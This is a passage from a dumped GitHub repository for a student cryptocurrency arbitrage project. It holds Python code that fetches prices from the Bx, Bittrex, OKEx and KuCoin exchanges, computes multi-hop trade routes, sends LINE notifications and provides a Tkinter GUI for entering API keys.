"text": "from myFunc import *\nclass getRoute2():\n def __init__(self,bt,okex):\n self.route(bt,okex)\n def route(self,bt,okex):\n temp_cur = [0]*5\n temp_tradeA = [0]*5\n temp_tradeB = [0]*5\n temp_value = [0]*5\n money = 500\n profit = []\n tradeRoute = []\n btUSD_id = []\n #print(bt.pairName)\n #print(bt.namePri[0])\n for i in range(len(bt.namePri)):\n if(bt.namePri[i] == 'USD'):\n #print(bt.pairName[i])\n btUSD_id.append(i)\n USD_id = btUSD_id\n for i in USD_id:\n value = money/bt.priceSell[i]\n value_cur = bt.nameSec[i]\n if(not value_cur in bt_fee):\n break\n if(value_cur == \"GNO\" or value_cur == \"REP\"):\n continue\n #print(\"%f %s\"%(value,value_cur))\n value = value-bt_fee[value_cur] #Send to bittrex\n temp_cur[0] = value_cur;\n temp_tradeA[0]=bt.namePri[i]\n temp_tradeB[0]=bt.nameSec[i]\n temp_value[0] = value\n #print('b')\n #---------------Sent to Bittrex ---------------\n for j in range(300):\n value = temp_value[0]\n if(temp_cur[0] == okex.namePri[j]):\n value = value/okex.priceSell[j] \n value_cur = okex.nameSec[j]\n temp_tradeA[1] = okex.namePri[j]\n temp_tradeB[1] = okex.nameSec[j]\n elif(temp_cur[0] == okex.nameSec[j]):\n value = value*okex.priceBuy[j]\n value_cur = okex.namePri[j]\n temp_tradeA[1] = okex.nameSec[j]\n temp_tradeB[1] = okex.namePri[j]\n else : continue\n temp_cur[1] = value_cur;\n temp_value[1] = value\n\n #print('c')\n for k in range(300):\n value = temp_value[1]\n if((okex.namePri[k] or okex.nameSec[k]) in okex_sent_cur):\n if(temp_cur[1] == okex.namePri[k]):\n value = value/okex.priceSell[k] \n value_cur = okex.nameSec[k]\n temp_tradeA[2] = okex.namePri[k]\n temp_tradeB[2] = okex.nameSec[k]\n \n elif(temp_cur[1] == okex.nameSec[k]):\n value = value*okex.priceBuy[k]\n value_cur = okex.namePri[k]\n temp_tradeA[2] = okex.nameSec[k]\n temp_tradeB[2] = okex.namePri[k]\n #print(value_cur)\n else: continue;\n if(not(value_cur in okex_sent_cur)):\n continue;\n value = value - okex_fee[value_cur]\n temp_cur[2] = value_cur;\n temp_value[2] = value\n #--------------Send back to bt-------------\n #print('d')\n for l in range(40):\n value=temp_value[2]\n if(temp_cur[2] == bt.namePri[l]):\n value = value/bt.priceSell[l] \n value_cur = bt.nameSec[l]\n temp_tradeA[3]=bt.namePri[l]\n temp_tradeB[3]=bt.nameSec[l]\n elif(temp_cur[2] == bt.nameSec[l]):\n value = value*bt.priceBuy[l]\n value_cur = bt.namePri[l]\n temp_tradeA[3]=bt.nameSec[l]\n temp_tradeB[3]=bt.namePri[l]\n else : continue\n temp_cur[3] = value_cur;\n temp_value[3] = value\n #print('e')\n for m in USD_id:\n value = temp_value[3]\n if(temp_cur[3] == bt.nameSec[m]):\n value = value*bt.priceBuy[m]\n temp_tradeA[4]=bt.nameSec[m]\n temp_tradeB[4]=bt.namePri[m]\n value_cur=bt.namePri[m]\n temp_value[4] = value\n #print('zzz')\n #print(value)\n #print(\"THB > %s > %s > %s > %s >THB\"%(temp_cur[0],temp_cur[1],temp_cur[2],temp_cur[3]))\n #print(\"THB > %s/%s >|| %s/%s > %s/%s >|| %s/%s > %s/%s\"%(temp_tradeA[0],temp_tradeB[0],temp_tradeA[1],temp_tradeB[1],temp_tradeA[2],temp_tradeB[2],temp_tradeA[3],temp_tradeB[3],temp_tradeA[4],temp_tradeB[4]))\n if(value > money):\n print(\"Result money %d Profit %d >> %s\" %(value,value-money,value_cur))\n print(\"%s > %s > %s > %s >THB\"%(temp_cur[0],temp_cur[1],temp_cur[2],temp_cur[3]))\n profit.append(value-money)\n tradeRoute.append([ \"%s-%s\"%(temp_tradeA[0],temp_tradeB[0]) , \"%s-%s\"%(temp_tradeA[1],temp_tradeB[1]) ,\"%s-%s\"%(temp_tradeA[2],temp_tradeB[2]) ,\"%s-%s\"%(temp_tradeA[3],temp_tradeB[3]) ,\"%s-%s\"%(temp_tradeA[4],temp_tradeB[4]) ])\n self.profit = profit\n self.tradeRoute = tradeRoute\n print(\"end\")\n\nbt_sent_cur , bt_fee = getSentBt()\nokex_sent_cur = bt_sent_cur\nokex_fee = bt_fee"
},
{
"alpha_fraction": 0.662382185459137,
"alphanum_fraction": 0.6692373752593994,
"avg_line_length": 30.45945930480957,
"blob_id": "dc965f8bb8965d1ecad58864eeee8874cbd38baf",
"content_id": "4241bf7bed7abd1d2b9d3b81e8ad04ea11490f3f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1167,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 37,
"path": "/fullAuto.py",
"repo_name": "layel2/crypto-arbitrage",
"src_encoding": "UTF-8",
"text": "import requests\nfrom myFunc import *\nfrom routeKucoin import *\nimport datetime as dt\nfrom lineMsg import *\nimport numpy as np\nfrom autotrade import *\n\ndef fullAutoTrade():\n\tnoti_token = \"\" #Line Token\n\tnoti_url = \"https://notify-api.line.me/api/notify\"\n\tnoti_headers = {'content-type':'application/x-www-form-urlencoded','Authorization':'Bearer '+noti_token}\n\t#select = {1:getRoute(bx,bt),2:getRoute2(),3:getRoute3(bx,kucoin),4:getRoute4(bt,kucoin)}\n\tbx = getBx()\n\tbt = getBittrex()\n\tkucoin = getKucoin()\n\tRoute = getRoute(bx,bt)\n\n\tif(Route.tradeRoute != []):\n\t\tnoti_msg = str(dt.datetime.now()) +'Bx -> Bt'+\"\\n\"\n\t\tfor i in range(len(Route.tradeRoute)):\n\t\t\tnoti_msg += str(Route.tradeRoute[i]) + \"\\n\" + str(Route.profit[i]) +\"\\n\" +\"---------\"+\"\\n\"\n\t\t\t#print(r.text)\t\t\n\tr=requests.post(noti_url,headers = noti_headers ,data = {'message':noti_msg})\n\tif(Route.tradeRoute != []):\n\t\tif(np.max(Route.profit) > 5):\n\t\t\tprint(\"Trade!\")\n\t\t\tsentLine(\"Start Trade\")\n\t\t\tmaxR = np.argmax(Route.profit)\n\t\t\troute = Route.tradeRoute[maxR]\n\t\t\tsentLine(\"Route \"+ str(route))\n\t\t\tTrade = routeTrade(Route.profit,Route.tradeRoute)\n\t\t\tsentLine(Trade)\n\nwhile True:\n\tfullAutoTrade()\n\tpass\n\n\n\n"
},
{
"alpha_fraction": 0.6251993775367737,
"alphanum_fraction": 0.6698564887046814,
"avg_line_length": 38.1875,
"blob_id": "6a62ec3beb96e1cfcd84e51d0f5554cb28335d96",
"content_id": "18142787920793b73630d10675edf6c1833a3b86",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 627,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 16,
"path": "/README.md",
"repo_name": "layel2/crypto-arbitrage",
"src_encoding": "UTF-8",
"text": "# crypto-arbitrage\n**My Senior Project 2018-2019**\n## ****This program is no longer useable because the bx.in.th exchanger is out of business. **\n\nrun GUI `python GUI.py`\n\n#### Home\n[](https://i.imgur.com/7J9fWyE.jpg \"\")\n[](https://i.imgur.com/K8j2FIh.jpg)\n#### Info get coin pair price, account balance\n[](https://imgur.com/wahrc15.jpg)\n#### Setting fill API key\n[](https://i.imgur.com/MxWP1mY.jpg)\n\n### Algo\n[](https://i.imgur.com/rP6X4Y7.jpg)\n"
},
{
"alpha_fraction": 0.6107944846153259,
"alphanum_fraction": 0.6712806820869446,
"avg_line_length": 28.85416603088379,
"blob_id": "7d334dd11c1aa21c659db502d6d68ebb49a36a0b",
"content_id": "af7e1199652247abd0dd6a834356a2fb625c74af",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8597,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 288,
"path": "/GUI.py",
"repo_name": "layel2/crypto-arbitrage",
"src_encoding": "UTF-8",
"text": "from tkinter import *\nfrom tkinter import ttk\nfrom myFunc import *\nimport numpy as np\nfrom autotrade import *\nfrom tkinter import messagebox\nimport tkinter\nimport bxapi\nimport bittrexapi\nimport time\nimport datetime as dt\nimport threading\n\n\ndef run():\n\tttt.configure(state=NORMAL)\n\tttt.insert(END,f\"Checking Route time:{str(dt.datetime.now())} \\n\")\n\tbx = getBx()\n\tbt = getBittrex()\n\tRoute = getRoute(bx,bt)\n\tif(Route.tradeRoute == []):\n\t\tttt.insert(END,\" No Route Found!\\n\")\n\t\tttt.insert(END,\" Delaying 2 Mins\\n\")\n\t\ttime.sleep(120)\n\t\trun()\n\telse :\n\t\tmsg = \"\"\n\t\tfor i in range(len(Route.tradeRoute)):\n\t\t\tmsg += str(Route.tradeRoute[i]) + \"\\n\" + str(Route.profit[i]) +\"\\n\"\n\t\tttt.insert(END,msg)\n\t\tif(np.max(Route.profit) > 5):\n\t\t\tttt.insert(END,\"Start Trade\\n\")\n\t\t\tmaxR = np.argmax(Route.profit)\n\t\t\troute = Route.tradeRoute[maxR]\n\t\t\tttt.insert(END,\"Route \"+ str(route)+\"\\n\")\n\t\t\tTrade = routeTrade(Route.profit,Route.tradeRoute)\n\t\t\tttt.insert(END,str(Trade)+\"\\n\")\n\t\telse :\n\t\t\tttt.insert(END,\"Don't trade Profit too low(High risk)\\n\")\n\t\t\trun()\n\n\ndef call_run():\n\t\tif(not keyCheck()):\n\t\t\tmessagebox.showinfo(\"Error\", \"Plseae fill the API Key at setting page first\")\n\t\t\treturn;\n\t\tttt.configure(state=NORMAL)\n\t\tttt.delete(1.0,END)\n\t\tttt.configure(state=DISABLED)\n\t\tglobal lb1_status\n\t\tif(lb1_status == False):\n\t\t\tmessagebox.showinfo(\"Title\", \"Program is Running !!!\")\n\t\t\treturn\n\t\telse :\n\t\t\tttt.delete(1.0,END)\n\t\t\tthread2 = threading.Thread(target = run)\n\t\t\tthread2.start()\n\ndef transhistory():\n\tif(not keyCheck()):\n\t\tmessagebox.showinfo(\"Error\", \"Plseae fill the API Key at setting page first\")\n\t\treturn;\n\tttt2.config(state=NORMAL)\n\tif(Transhis_box.get() == 'bx'):\n\t#lif(Transhis_box.get() == 'bittrex'):\n\t\tdata = bxapi.TransHistory()\n\t\t#print (\"a\")\n\t\tfor i in range(len(data)):\n\t\t\tttt2.insert(END,f\"Date : {data[i]['date']} , Currency : {data[i]['currency']} , Amount : {data[i]['amount']} , Type : {data[i]['type']} \\n\")\n\tttt2.config(state=DISABLED)\n\ndef tab3Save():\n\tbxapi.key = entrytab3_1.get()\n\tbxapi.secret = entrytab3_2.get()\n\tbittrexapi.key = entrytab3_3.get()\n\tbittrexapi.secret = entrytab3_4.get()\n\ndef keyCheck():\n\t\tif(bxapi.key == \"\" or bxapi.secret==\"\"or bittrexapi.key == \"\" or bittrexapi.secret==\"\"):\n\t\t\treturn False\n\t\telse : return True \n\ndef showGetPrice():\n\tif(not keyCheck()):\n\t\tmessagebox.showinfo(\"Error\", \"Plseae fill the API Key at setting page first\")\n\t\treturn;\n\tif(selEx1.get() == 'bx'):\n\t\tpriceTxt = bxapi.getPrice(entrytab2_1.get(),type1.get())[0]\n\t\tlabeltab2_2.config(text = priceTxt)\n\telif(selEx1.get() == 'bittrex'):\n\t\tlabeltab2_2.config(text = bittrexapi.getPrice(entrytab2_1.get(),type1.get())[0])\n\ndef showGetBalance():\n\tif(not keyCheck()):\n\t\tmessagebox.showinfo(\"Error\", \"Plseae fill the API Key at setting page first\")\n\t\treturn;\n\t#print (type(selEx2))\n\tif(selEx2.get() == 'bx'):\n\t\tlabeltab2_4.config(text = bxapi.getBalance(entrytab2_2.get()))\n\telif(selEx2.get() == 'bittrex'):\n\t\tlabeltab2_4.config(text = bittrexapi.getBalance(entrytab2_2.get()))\n\t#print(type1.get())\n\ndef findPath():\n\tglobal lb1_status\n\tlb1_status = False\n\tttt.configure(state=NORMAL)\n\tttt.delete(1.0,END)\n\tttt.insert(END,'Please Wait !!!')\n\t#time.sleep(1)\n\tbx = getBx()\n\tbt = getBittrex()\n\tRoute = getRoute(bx,bt)\n\tttt.delete(1.0,END)\n\tif(len(Route.profit) == 0) : ttt.insert(END,'No Route')\n\tfor i in range(len(Route.profit)):\n\t\tprint(\"Profit : %f <> Route : %s \\n\"%(Route.profit[i],Route.tradeRoute[i]))\n\t\tttt.insert(END,\"Profit : %f <> Route : %s \\n\"%(Route.profit[i],Route.tradeRoute[i]))\n\tttt.configure(state=DISABLED)\n\tlb1_status = True\n\ndef call_findPath():\n\tif(not keyCheck()):\n\t\tmessagebox.showinfo(\"Error\", \"Plseae fill the API Key at setting page first\")\n\t\treturn;\n\tglobal lb1_status\n\tif(lb1_status == False):\n\t\tmessagebox.showinfo(\"Title\", \"Program is Running !!!\")\n\t\treturn\n\telse:\n\t\tthread = threading.Thread(target = findPath)\n\t\tthread.start()\n\ndef testF():\n\tstop.clear()\n\tfor i in range(1,100):\n\t\tttt.configure(state=NORMAL)\n\t\ttime.sleep(0.5)\n\t\tttt.insert(END,str(i)+'\\n')\n\t\tttt.configure(state=DISABLED)\ndef stopF():\n\tstop.set()\n\t\ndef boom():\n\tgui.destroy()\n\"\"\"\ndef showTrans():\n\tttt2.config(state=NORMAL)\n\ttransData = bxapi.TransHistory()\n\tprint(transData)\n\tfor i in range(len(transData)):\n\t\tprint('w')\n\t\tprint(f\"Date : {transData[i]['date']} , Currency : {transData[i]['currency']} , Amount : {transData[i]['amount']} , Type : {transData[i]['type']}\")\n\n\tttt2.config(state=DISABLED)\n\"\"\"\n\nstop = threading.Event()\n\ngui = Tk()\ngui.title(\"Bx & Bittrex Arbitrage\")\ngui.geometry(\"640x640\") #640x640\ngui.configure(bg = \"grey\")\n\ntab_ctrl = ttk.Notebook(gui)\n\n\n#tab1\ntab1 = ttk.Frame(tab_ctrl)\ntab_ctrl.add(tab1,text=\"Home\")\nlabeltab1_1 = Label(tab1,text = \"Bx & Bittrex\",fg = \"#CD5C5C\",font = (40))\nlabeltab1_1.place(x=260,y = 10)\nlabeltab1_2 = Label(tab1,text = \"Arbitrage\",fg = \"#CD5C5C\",font = (40))\nlabeltab1_2.place(x=270,y = 40)\nbuttontab1_1 = Button(tab1,text = \"Run\",height = 2,width = 13,command = call_run)\nbuttontab1_1.place(x=100 ,y = 500)\nbuttontab1_2 = Button(tab1,text = \"Find path\",height = 2,width = 13,command = call_findPath)\nbuttontab1_2.place(x=400 ,y = 500)\nbuttontab1_3 = Button(tab1,text = \"Stop\",height = 2,width = 13,command = boom)\nbuttontab1_3.place(x=100 ,y = 550)\nttt = Text(tab1,height = 25,width = 90) #big box\nttt.place(x=35,y=70)\n\nlb1_status = True\n#ttt.pack(side=LEFT, fill=Y)\n#ttt.insert(END,'sdaasda')\n#for i in range(1,100):\n#\tttt.insert(END,str(i)+'\\n')\nttt.config(state=DISABLED)\n#tab2\ntab2 = ttk.Frame(tab_ctrl)\ntab_ctrl.add(tab2,text = \"Info\")\nlbtype2_11 = Label(tab2,text = \"Exchange\",fg = 'black')\nlbtype2_11.place(x=80,y = 2)\nlbtype2_12 = Label(tab2,text = \"Pair\",fg = 'black')\nlbtype2_12.place(x=150,y = 2)\nlbtype2_13 = Label(tab2,text = \"Trade Type\",fg = 'black')\nlbtype2_13.place(x=230,y = 2)\n\n\nlabeltab2_1 = Label(tab2,text = \"Get Price\",fg = 'black')\nlabeltab2_1.place(x=5,y = 20)\nselEx1 = ttk.Combobox(tab2, values=['bx','bittrex'],height = 1,width = 5)\nselEx1.place(x=80,y = 20)\nentrytab2_1 = Entry(tab2,width = 10)\nentrytab2_1.place(x=150,y = 20)\ntype1 = ttk.Combobox(tab2, values=['buy','sell'],height = 1,width = 5)\ntype1.place(x=230,y = 20)\nbuttontab2_1 = Button(tab2,text = \"Ok\",height = 1,width = 5,command = showGetPrice)\nbuttontab2_1.place(x=300,y = 20)\nlabeltab2_2 = Label(tab2,text = \"\",fg = 'black')\nlabeltab2_2.place(x=80,y = 40)\n\nlbtype2_21 = Label(tab2,text = \"Exchange\",fg = 'black')\nlbtype2_21.place(x=80,y = 60)\nlbtype2_22 = Label(tab2,text = \"Coin Name\",fg = 'black')\nlbtype2_22.place(x=150,y = 60)\n\n\nlabeltab2_3 = Label(tab2,text = \"My Balance\",fg = 'black')\nlabeltab2_3.place(x=5,y = 80)\nselEx2 = ttk.Combobox(tab2, values=['bx','bittrex'],height = 1,width = 5)\nselEx2.place(x=80,y = 80)\nentrytab2_2 = Entry(tab2,width = 10)\nentrytab2_2.place(x=150,y = 80)\nbuttontab2_2 = Button(tab2,text = \"Ok\",height = 1,width = 5,command = showGetBalance)\nbuttontab2_2.place(x=300,y = 80)\nlabeltab2_4 = Label(tab2,text = \"\",fg = 'black')\nlabeltab2_4.place(x=230,y = 80)\n\nlbtype2_21 = Label(tab2,text = \"Exchange\",fg = 'black')\nlbtype2_21.place(x=150,y = 100)\n\nTranshis_label = Label(tab2,text = \"Transactions History\",fg = 'black')\nTranshis_label.place(x=5 , y = 120)\nTranshis_box = ttk.Combobox(tab2, values=['bx','bittrex'],height = 1,width = 5)\nTranshis_box.place(x=150 , y = 120)\n\nTranshis_box_ok = Button(tab2,text = \"Ok\",height = 1,width = 5,command = transhistory)\nTranshis_box_ok.place(x=300,y = 120)\n\nttt2 = Text(tab2,height = 15,width = 100)\nttt2.place(x=5,y=160)\n\n\n#ttt2.insert(END,bxapi.wdHistory())\n\n\n\n\nttt2.config(state=DISABLED)\n\n#tab3\ntab3 = ttk.Frame(tab_ctrl)\ntab_ctrl.add(tab3,text=\"Setting\")\n\nlabeltab3_1 = Label(tab3,text = \"Bx\",fg = 'black',font =(30))\nlabeltab3_1.place(x=300,y = 10)\nlabeltab3_2 = Label(tab3,text = \"API key\",fg = 'black',)\nlabeltab3_2.place(x=70,y = 50)\nentrytab3_1 = Entry(tab3,width = 60)\nentrytab3_1.place(x=150,y = 50)\nlabeltab3_3 = Label(tab3,text = \"API secret\",fg = 'black',)\nlabeltab3_3.place(x=70,y = 70)\nentrytab3_2 = Entry(tab3,width = 60)\nentrytab3_2.place(x=150,y = 70)\n\nlabeltab3_4 = Label(tab3,text = \"Bittrex\",fg = 'black',font =(30))\nlabeltab3_4.place(x=280,y = 100)\nlabeltab3_5 = Label(tab3,text = \"API key\",fg = 'black',)\nlabeltab3_5.place(x=70,y = 140)\nentrytab3_3 = Entry(tab3,width = 60)\nentrytab3_3.place(x=150,y = 140)\nlabeltab3_6 = Label(tab3,text = \"API secret\",fg = 'black',)\nlabeltab3_6.place(x=70,y = 160)\nentrytab3_4 = Entry(tab3,width = 60)\nentrytab3_4.place(x=150,y = 160)\nbuttontab3_1 = Button(tab3,text = \"Send\",height = 2,width = 13,command = tab3Save)\nbuttontab3_1.place(x=260,y = 200)\n\n#push\ntab_ctrl.pack(expand = 1,fill = 'both')\n\n\n\n\n\ngui.mainloop()"
},
{
"alpha_fraction": 0.40127530694007874,
"alphanum_fraction": 0.4340530335903168,
"avg_line_length": 43.034481048583984,
"blob_id": "f677196ffbe3a6ac4d0ee82fcc9de6202f2d5e65",
"content_id": "84bc7e2abc4d5b004113f66cb6cab91680ce3201",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17878,
"license_type": "no_license",
"max_line_length": 411,
"num_lines": 406,
"path": "/myFunc.py",
"repo_name": "layel2/crypto-arbitrage",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[6]:\n\n\nimport requests\nimport bxapi\n\n# In[7]:\n\n\nclass getBx():\n def __init__(self):\n self.data()\n def data(self):\n bx_pair = requests.get('https://bx.in.th/api/pairing/')\n bx_data_pair = bx_pair.json()\n #money = 800 ;\n money = bxapi.getBalance('THB')\n print(f\"Current Money : {money}\")\n bx_price = [0]*40\n bx_price_buy = [0]*40\n bx_price_sell = [0]*40\n bx_name_pri = [0]*40\n bx_name_sec = [0]*40\n for i in range(1,35):\n try:\n bx_price[i] = requests.get('https://bx.in.th/api/orderbook/?pairing='+str(i))\n bx_price[i] = bx_price[i].json()\n bx_price_sell[i] = float(bx_price[i]['asks'][0][0])\n bx_price_buy[i] = float(bx_price[i]['bids'][0][0])\n bx_name_pri[i] = bx_data_pair[str(i)]['primary_currency']\n bx_name_sec[i] = bx_data_pair[str(i)]['secondary_currency']\n\n\n except:\n pass\n\n THB_id = []\n bx_cur_to_thb = []\n\n for i in range(1,35):\n try:\n if(bx_data_pair[str(i)]['primary_currency']=='THB'):\n THB_id.append(i)\n bx_cur_to_thb.append(bx_data_pair[str(i)]['secondary_currency'])\n except:\n pass\n self.price = bx_price\n self.priceSell = bx_price_sell\n self.priceBuy = bx_price_buy\n self.namePri = bx_name_pri\n self.nameSec = bx_name_sec\n self.dataPair = bx_data_pair\n self.THBid = THB_id\n \n\n\n# In[20]:\n\n\nclass getBittrex():\n def __init__(self):\n self.data()\n def data(self):\n bt_pair_name = []\n bt_price_buy = []\n bt_price_sell = []\n bt_name_pri = []\n bt_name_sec = []\n url = 'https://api.bittrex.com/api/v1.1/public/getmarketsummaries'\n r = requests.get(url)\n data = r.json()['result']\n for i in range(len(data)):\n #print(data[i]['MarketName'])\n splitTemp = data[i]['MarketName'].split('-')\n bt_pair_name.append(data[i]['MarketName'])\n bt_name_pri.append(splitTemp[0])\n bt_name_sec.append(splitTemp[1])\n bt_price_buy.append(data[i]['Bid'])\n bt_price_sell.append(data[i]['Ask'])\n\n for i in range(len(bt_name_pri)):\n if(bt_name_pri[i] == 'DOGE'):\n bt_name_pri[i] = 'DOG'\n if(bt_name_sec[i] == 'DOGE'):\n bt_name_sec[i] = 'DOG'\n self.priceSell = bt_price_sell\n self.priceBuy = bt_price_buy\n self.namePri = bt_name_pri\n self.nameSec = bt_name_sec\n self.pairName = bt_pair_name\n\nclass getOkex():\n def __init__(self):\n self.data()\n def data(self):\n okex_pair_name = []\n okex_price_buy = []\n okex_price_sell = []\n okex_name_pri = []\n okex_name_sec = []\n \n url = 'https://www.okex.com/api/spot/v3/instruments/ticker'\n r = requests.get(url)\n data = r.json()\n \n for i in range(len(data)):\n splitTemp = data[i]['instrument_id'].split('-')\n okex_pair_name.append(data[i]['instrument_id'])\n okex_name_pri.append(splitTemp[1])\n okex_name_sec.append(splitTemp[0])\n okex_price_buy.append(float(data[i]['bid']))\n okex_price_sell.append(float(data[i]['ask']))\n\n for i in range(len(okex_name_pri)):\n if(okex_name_pri[i] == 'DOGE'):\n okex_name_pri[i] = 'DOG'\n if(okex_name_sec[i] == 'DOGE'):\n okex_name_sec[i] = 'DOG'\n self.priceSell = okex_price_sell\n self.priceBuy = okex_price_buy\n self.namePri = okex_name_pri\n self.nameSec = okex_name_sec\n \nclass getKucoin():\n def __init__(self):\n self.data()\n def data(self):\n kucoin_pair_name = []\n kucoin_price_buy = []\n kucoin_price_sell = []\n kucoin_name_pri = []\n kucoin_name_sec = []\n \n url = 'https://api.kucoin.com/api/v1/market/allTickers'\n r= requests.get(url)\n data = r.json()['data']['ticker']\n #print(data[25])\n \n for i in range(len(data)):\n splitTemp = data[i]['symbol'].split('-')\n kucoin_pair_name.append(data[i]['symbol'])\n kucoin_name_pri.append(splitTemp[1])\n kucoin_name_sec.append(splitTemp[0])\n kucoin_price_buy.append(float(data[i]['buy']))\n kucoin_price_sell.append(float(data[i]['sell']))\n self.priceSell = kucoin_price_sell\n self.priceBuy = kucoin_price_buy\n self.namePri = kucoin_name_pri\n self.nameSec = kucoin_name_sec\n self.pairName = kucoin_pair_name\n\n# In[21]:\n\n\nclass getRoute():\n def __init__(self,bx,bt):\n self.route(bx,bt)\n def route(self,bx,bt):\n temp_cur = [0]*5\n temp_tradeA = [0]*5\n temp_tradeB = [0]*5\n temp_value = [0]*5\n money = 500\n profit = []\n tradeRoute = []\n THB_id = bx.THBid\n for i in THB_id:\n value = money/bx.priceSell[i]\n value_cur = bx.dataPair[str(i)]['secondary_currency']\n if(value_cur == \"GNO\" or value_cur == \"REP\" or value_cur == 'BSV' or value_cur == 'XZC' or value_cur == 'BCH'):\n continue\n #print(\"%f %s\"%(value,value_cur))\n value = value-bx_fee[value_cur] #Send to bittrex\n temp_cur[0] = value_cur;\n temp_tradeA[0]=bx.dataPair[str(i)]['primary_currency']\n temp_tradeB[0]=bx.dataPair[str(i)]['secondary_currency']\n temp_value[0] = value\n #print('b')\n #---------------Sent to Bittrex ---------------\n for j in range(300):\n value = temp_value[0]\n if(temp_cur[0] == bt.namePri[j]):\n value = value/bt.priceSell[j] \n value_cur = bt.nameSec[j]\n temp_tradeA[1] = bt.namePri[j]\n temp_tradeB[1] = bt.nameSec[j]\n elif(temp_cur[0] == bt.nameSec[j]):\n value = value*bt.priceBuy[j]\n value_cur = bt.namePri[j]\n temp_tradeA[1] = bt.nameSec[j]\n temp_tradeB[1] = bt.namePri[j]\n else : continue\n temp_cur[1] = value_cur;\n temp_value[1] = value\n\n #print('c')\n for k in range(300):\n value = temp_value[1]\n if((bt.namePri[k] or bt.nameSec[k]) in bt_sent_cur):\n if(temp_cur[1] == bt.namePri[k]):\n value = value/bt.priceSell[k] \n value_cur = bt.nameSec[k]\n temp_tradeA[2] = bt.namePri[k]\n temp_tradeB[2] = bt.nameSec[k]\n \n elif(temp_cur[1] == bt.nameSec[k]):\n value = value*bt.priceBuy[k]\n value_cur = bt.namePri[k]\n temp_tradeA[2] = bt.nameSec[k]\n temp_tradeB[2] = bt.namePri[k]\n #print(value_cur)\n else: continue;\n if(not(value_cur in bt_sent_cur)):\n continue;\n value = value - bt_fee[value_cur]\n temp_cur[2] = value_cur;\n temp_value[2] = value\n #--------------Send back to Bx-------------\n #print('d')\n for l in range(40):\n value=temp_value[2]\n if(temp_cur[2] == bx.namePri[l]):\n value = value/bx.priceSell[l] \n value_cur = bx.nameSec[l]\n temp_tradeA[3]=bx.namePri[l]\n temp_tradeB[3]=bx.nameSec[l]\n elif(temp_cur[2] == bx.nameSec[l]):\n value = value*bx.priceBuy[l]\n value_cur = bx.namePri[l]\n temp_tradeA[3]=bx.nameSec[l]\n temp_tradeB[3]=bx.namePri[l]\n else : continue\n temp_cur[3] = value_cur;\n temp_value[3] = value\n #print('e')\n for m in THB_id:\n value = temp_value[3]\n if(temp_cur[3] == bx.nameSec[m]):\n value = value*bx.priceBuy[m]\n temp_tradeA[4]=bx.nameSec[m]\n temp_tradeB[4]=bx.namePri[m]\n value_cur=bx.namePri[m]\n temp_value[4] = value\n #print('zzz')\n #print(f'Result money {value} Profit{value-money}')\n #print(\"THB > %s > %s > %s > %s >THB\"%(temp_cur[0],temp_cur[1],temp_cur[2],temp_cur[3]))\n #print(\" THB > %s/%s >|| %s/%s > %s/%s >|| %s/%s > %s/%s\"%(temp_tradeA[0],temp_tradeB[0],temp_tradeA[1],temp_tradeB[1],temp_tradeA[2],temp_tradeB[2],temp_tradeA[3],temp_tradeB[3],temp_tradeA[4],temp_tradeB[4]))\n #print(\"\")\n if(value > money):\n #print(\"Result money %d Profit %d >> %s\" %(value,value-money,value_cur))\n #print(\"%s > %s > %s > %s >THB\"%(temp_cur[0],temp_cur[1],temp_cur[2],temp_cur[3]))\n profit.append(value-money)\n tradeRoute.append([ \"%s-%s\"%(temp_tradeA[0],temp_tradeB[0]) , \"%s-%s\"%(temp_tradeA[1],temp_tradeB[1]) ,\"%s-%s\"%(temp_tradeA[2],temp_tradeB[2]) ,\"%s-%s\"%(temp_tradeA[3],temp_tradeB[3]) ,\"%s-%s\"%(temp_tradeA[4],temp_tradeB[4]) ])\n self.profit = profit\n self.tradeRoute = tradeRoute\n print(\"End Route1\")\n\nclass getRoute11():\n def __init__(self,bx,bt):\n self.route(bx,bt)\n def route(self,bx,bt):\n temp_cur = [0]*5\n temp_tradeA = [0]*5\n temp_tradeB = [0]*5\n temp_value = [0]*5\n money = 0.003\n profit = []\n tradeRoute = []\n BTC_id = []\n for i in range(1,35):\n #try:\n if(bx.namePri[i]=='BTC'):\n if(bx.nameSec[i] in ['ZET','CPT','LEO']) : continue\n BTC_id.append(i)\n #bx_cur_to_thb.append(bx_data_pair[str(i)]['secondary_currency'])\n #except:\n # pass\n print(BTC_id)\n for i in [2, 3, 4, 5, 6, 7, 8, 9, 11, 13, 14, 15, 17, 18, 20]:\n print(bx.namePri[i] + \" \" +bx.nameSec[i])\n for i in BTC_id:\n value = money/bx.priceSell[i]\n value_cur = bx.dataPair[str(i)]['secondary_currency']\n if(value_cur == \"GNO\" or value_cur == \"REP\"):\n continue\n #print(\"%f %s\"%(value,value_cur))\n value = value-bx_fee[value_cur] #Send to bittrex\n temp_cur[0] = value_cur;\n temp_tradeA[0]=bx.dataPair[str(i)]['primary_currency']\n temp_tradeB[0]=bx.dataPair[str(i)]['secondary_currency']\n temp_value[0] = value\n #print('b')\n #---------------Sent to Bittrex ---------------\n for j in range(300):\n value = temp_value[0]\n if(temp_cur[0] == bt.namePri[j]):\n value = value/bt.priceSell[j] \n value_cur = bt.nameSec[j]\n temp_tradeA[1] = bt.namePri[j]\n temp_tradeB[1] = bt.nameSec[j]\n elif(temp_cur[0] == bt.nameSec[j]):\n value = value*bt.priceBuy[j]\n value_cur = bt.namePri[j]\n temp_tradeA[1] = bt.nameSec[j]\n temp_tradeB[1] = bt.namePri[j]\n else : continue\n temp_cur[1] = value_cur;\n temp_value[1] = value\n\n #print('c')\n for k in range(300):\n value = temp_value[1]\n if((bt.namePri[k] or bt.nameSec[k]) in bt_sent_cur):\n if(temp_cur[1] == bt.namePri[k]):\n value = value/bt.priceSell[k] \n value_cur = bt.nameSec[k]\n temp_tradeA[2] = bt.namePri[k]\n temp_tradeB[2] = bt.nameSec[k]\n \n elif(temp_cur[1] == bt.nameSec[k]):\n value = value*bt.priceBuy[k]\n value_cur = bt.namePri[k]\n temp_tradeA[2] = bt.nameSec[k]\n temp_tradeB[2] = 